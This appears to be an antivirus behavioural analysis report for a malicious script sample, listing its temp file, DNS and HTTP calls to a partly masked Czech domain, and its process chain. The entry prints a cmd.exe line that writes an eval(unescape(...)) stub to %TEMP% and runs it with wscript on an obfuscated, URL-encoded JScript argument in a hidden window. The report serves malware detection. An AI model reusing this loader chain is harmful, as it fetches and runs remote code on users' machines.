Technical Information
Modifies file system
Creates the following files
- %TEMP%\76782785.txt
Network activity
Connects to
- 'ne####enadhanou.cz':80
TCP
HTTP GET requests
- http://www.ne####enadhanou.cz/nvdtime.prs
UDP
- DNS ASK ho##or.com
- DNS ASK ne####enadhanou.cz
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\wscript.exe' /E:JScript %TEMP%\76782785.TXT "%28function%28%29%7B%3BtQINHnv%3D%20%2824219%2C%22%25T%22+%22EMP%25%22%29%3BeAtBFv%3D%20%2830004%2C%22Ex%22+%22ec%22%29%3BRDPOj%3D%20%2832030%2C%22ne%22+%22w%20A...
- '<SYSTEM32>\cmd.exe' /c echo eval(unescape(WScript.Arguments(0))) > %TEMP%\76782785.TXT && timeout 3 && wscript /E:JScript %TEMP%\76782785.TXT "%28function%28%29%7B%3BtQINHnv%3D%20%2824219%2C%22%25T%22+%22EMP%25%22...' (with hidden window)
Executes the following
- '<SYSTEM32>\cmd.exe' /c echo eval(unescape(WScript.Arguments(0))) > %TEMP%\76782785.TXT && timeout 3 && wscript /E:JScript %TEMP%\76782785.TXT "%28function%28%29%7B%3BtQINHnv%3D%20%2824219%2C%22%25T%22+%22EMP%25%22...
- '<SYSTEM32>\timeout.exe' 3
